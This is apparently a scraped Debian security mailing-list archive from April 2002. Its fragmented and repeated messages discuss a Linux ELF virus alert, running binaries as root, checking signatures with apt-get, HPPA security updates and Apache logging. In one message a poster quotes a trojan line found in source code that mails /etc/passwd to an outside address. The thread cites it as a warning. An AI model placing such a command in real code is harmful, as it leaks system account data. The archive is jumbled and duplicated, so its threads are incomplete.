Could someone tell me why I still get these messages in apache?
Premature end of script headers: /usr/lib/cgi-bin/php4
Is there something wrong with php in debian package?
Regards
Michal Novotny
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact
Hi there!
I've read a srtange info at
http://www3.ca.com/Virus/Virus.asp?ID=11513
is it true?
can it infect my debian systems? (woody, sid, potato)?
how?
thanks
ELF.OSF.8759
Alias: Linux.Osf.8759
Category: UNIX/Linux
Type: Virus
Wild:
Destructiveness:
Pervasiveness:
CHARACTERISTICS
OSF.8759
On Wed, Apr 10, 2002 at 06:24:01PM +0200, Narancs v1 wrote:
Hi there!
I've read a srtange info at
http://www3.ca.com/Virus/Virus.asp?ID=11513
is it true?
can it infect my debian systems? (woody, sid, potato)?
how?
If you run an infected file - yes. Otherwise - i don't think so (they
On Wed, Apr 10, 2002 at 07:46:22PM +0200, Marcin Owsiany wrote:
On Wed, Apr 10, 2002 at 06:24:01PM +0200, Narancs v1 wrote:
Hi there!
I've read a srtange info at
http://www3.ca.com/Virus/Virus.asp?ID=11513
is it true?
can it infect my debian systems? (woody, sid, potato)?
how?
On Wed, Apr 10, 2002 at 10:52:38AM -0700, Brandon High wrote:
And another reason not to run as root...
Compile from source is a good idea too. It's amazing what you
can find in the source. I found a couple of stupid Trojans
that way.
system(mail /etc/passwd [EMAIL PROTECTED]);
*sigh*
wow, that's bad! where did you find that evil code?
jmb
At 02:44 PM 4/10/02 -0700, Anne Carasik wrote:
On Wed, Apr 10, 2002 at 10:52:38AM -0700, Brandon High wrote:
And another reason not to run as root...
Compile from source is a good idea too. It's amazing what you
can find in the source.
On Wed, Apr 10, 2002 at 05:46:24PM -0400, Dominique Fortier wrote:
Basically, if you run binaries from an unsafe source, you get what you
deserve.
Man, I try to be a honnest individual, I hope I don't deserve something
like that !
..., Is there such a thing has a 100% safe source for
Hello,
i have an old cobalt cube on my network running a cutom 2.0.34 kernel,
that i'm finding is going to be really hard to upgrade, it's not running
debian, but everything else in here is :) so i'm only asking here
because i've read the docs and tried everywhere else for help.
anyway,
it has
On Wed, Apr 10, 2002 at 02:54:26PM -0700, Anne Carasik wrote:
with Trojan horses. Always check the digital signatures and the
checksums!
Debian does this when you do an apt-get, I believe.
I think there's support for it in later versions of apt-get, but not
with the one included with
I'm new to debian linux, and I am having trouble finding the security
updates for the HPPA system. I have looked all through
http://security.debian.org/dists/ I found the updates for the other
ports, but not hppa. Any thoughts on where I might find them or what to
put in the sources.list file?
Chris Gray [EMAIL PROTECTED] writes:
I'm new to debian linux, and I am having trouble finding the security
updates for the HPPA system. I have looked all through
http://security.debian.org/dists/ I found the updates for the other
ports, but not hppa. Any thoughts on where I might find
dear,
i have webserver (running on localnet rfc1918) stay behind a
firewall (using rinetd for redirecting), the apache's log
read all access from the internal interface's firewall
instead of the original source address.
any idea how can i log the original source ipaddress's
anyone who access my
i'm not familiar with rinetd, but if you use netfilter to do dnat the source
address will be maintained. just make sure internal boxes hit the
webserver directly, on the internal ip, rather than through the external
one so they don't get confused by packets coming back directly from the
web
Could someone tell me why I still get these messages in apache?
Premature end of script headers: /usr/lib/cgi-bin/php4
Is there something wrong with php in debian package?
Regards
Michal Novotny
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact
Hi there!
I've read a srtange info at
http://www3.ca.com/Virus/Virus.asp?ID=11513
is it true?
can it infect my debian systems? (woody, sid, potato)?
how?
thanks
ELF.OSF.8759
Alias: Linux.Osf.8759
Category: UNIX/Linux
Type: Virus
Wild:
Destructiveness:
Pervasiveness:
CHARACTERISTICS
OSF.8759
On Wed, Apr 10, 2002 at 06:24:01PM +0200, Narancs v1 wrote:
Hi there!
I've read a srtange info at
http://www3.ca.com/Virus/Virus.asp?ID=11513
is it true?
can it infect my debian systems? (woody, sid, potato)?
how?
If you run an infected file - yes. Otherwise - i don't think so (they
On Wed, Apr 10, 2002 at 07:46:22PM +0200, Marcin Owsiany wrote:
On Wed, Apr 10, 2002 at 06:24:01PM +0200, Narancs v1 wrote:
Hi there!
I've read a srtange info at
http://www3.ca.com/Virus/Virus.asp?ID=11513
is it true?
can it infect my debian systems? (woody, sid, potato)?
how?
On Wed, Apr 10, 2002 at 10:52:38AM -0700, Brandon High wrote:
And another reason not to run as root...
Compile from source is a good idea too. It's amazing what you
can find in the source. I found a couple of stupid Trojans
that way.
system(mail /etc/passwd [EMAIL PROTECTED]);
*sigh*
-Anne
On Wed, 2002-04-10 at 13:46, Marcin Owsiany wrote:
On Wed, Apr 10, 2002 at 06:24:01PM +0200, Narancs v1 wrote:
Hi there!
I've read a srtange info at
http://www3.ca.com/Virus/Virus.asp?ID=11513
is it true?
can it infect my debian systems? (woody, sid, potato)?
how?
If you run
wow, that's bad! where did you find that evil code?
jmb
At 02:44 PM 4/10/02 -0700, Anne Carasik wrote:
On Wed, Apr 10, 2002 at 10:52:38AM -0700, Brandon High wrote:
And another reason not to run as root...
Compile from source is a good idea too. It's amazing what you
can find in the source.
On Wed, Apr 10, 2002 at 05:46:24PM -0400, Dominique Fortier wrote:
Basically, if you run binaries from an unsafe source, you get what you
deserve.
Man, I try to be a honnest individual, I hope I don't deserve something
like that !
..., Is there such a thing has a 100% safe source for
Hello,
i have an old cobalt cube on my network running a cutom 2.0.34 kernel,
that i'm finding is going to be really hard to upgrade, it's not running
debian, but everything else in here is :) so i'm only asking here
because i've read the docs and tried everywhere else for help.
anyway,
it has
On Wed, Apr 10, 2002 at 02:54:26PM -0700, Anne Carasik wrote:
with Trojan horses. Always check the digital signatures and the
checksums!
Debian does this when you do an apt-get, I believe.
I think there's support for it in later versions of apt-get, but not
with the one included with Potato.
I'm new to debian linux, and I am having trouble finding the security
updates for the HPPA system. I have looked all through
http://security.debian.org/dists/ I found the updates for the other
ports, but not hppa. Any thoughts on where I might find them or what to
put in the sources.list file?
Chris Gray [EMAIL PROTECTED] writes:
I'm new to debian linux, and I am having trouble finding the security
updates for the HPPA system. I have looked all through
http://security.debian.org/dists/ I found the updates for the other
ports, but not hppa. Any thoughts on where I might find them
25 matches
Mail list logo